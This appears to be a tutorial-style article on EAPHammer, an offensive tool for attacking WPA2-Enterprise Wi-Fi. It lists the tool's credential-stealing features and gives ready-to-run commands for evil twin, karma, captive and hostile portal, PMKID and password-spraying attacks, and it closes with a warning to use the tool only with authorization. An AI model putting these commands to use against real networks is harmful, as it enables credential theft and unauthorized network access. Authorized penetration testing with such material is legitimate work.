EAPHammer is a tool that was developed to test the security of WPA2-Enterprise networks. It was created by Gabriel Ryan (s0lst1c3) and is designed to exploit vulnerabilities in the Extensible Authentication Protocol (EAP), commonly used in enterprise Wi-Fi networks.
WPA2-Enterprise is a security protocol that provides more robust authentication and encryption mechanisms than the standard WPA2 used in home and small office networks. It relies on a RADIUS server for authentication, and EAP is the protocol used for communication between the client and the server.
Features
- Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
- Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
- Perform captive portal attacks
- Built-in Responder integration
- Support for Open networks and WPA-EAP/WPA2-EAP
- No manual configuration is necessary for most attacks.
- No manual configuration necessary for installation and setup process
- Leverages latest version of hostapd (2.8)
- Support for evil twin and karma attacks
- Generate timed Powershell payloads for indirect wireless pivots
- Integrated HTTP server for Hostile Portal attacks
- Support for SSID cloaking
- Fast and automated PMKID attacks against PSK networks using hcxtools
- Password spraying across multiple usernames against a single ESSID
EAPHammer leverages a technique called “EAP Downgrade Attack” to force clients to use weaker EAP methods, such as EAP-MD5 or EAP-LEAP, instead of the more secure EAP methods like EAP-TLS or PEAP. By downgrading the authentication method, the attacker can then attempt to exploit vulnerabilities in the weaker EAP methods to gain unauthorized access to the network.
How to Install EAPHammer
git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup
./parot-setup
./raspbian-setup
Generate EAPHammer Certificates
./eaphammer --cert-wizard
./eaphammer -i wlan0 --channel 5 --auth wpa-eap --essid OffWifi --creds
Karma attacks
./eaphammer -i wlan0 --essid offwifi --cloaking full -c 7 --auth open --hostile-portal --karma
PMKID Attacks
./eaphammer --pmkid --interface wlan0 --bssid fc:ad:83:77:fe:ab --channel 10
ESSID Cloaking
./eaphammer -i wlan0 -e CompanyXYZ -c 1 --auth open --hostile-portal --cloaking full
Captive Portal Attacks
./eaphammer --bssid fc:ad:83:77:fe:ab --essid CompanyXYZ --channel 149 --interface wlan0 --captive-portal
Password Spraying
./eaphammer --eap-spray --interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 --essid CompanyXYZ --password qwerty1234 --user-list users.txt
GitHub: https://github.com/s0lst1c3/eaphammer
It’s important to note that EAPHammer is an offensive security tool and should only be used in authorized and controlled environments for legitimate security testing purposes. Using it to attack networks without proper authorization is illegal and unethical.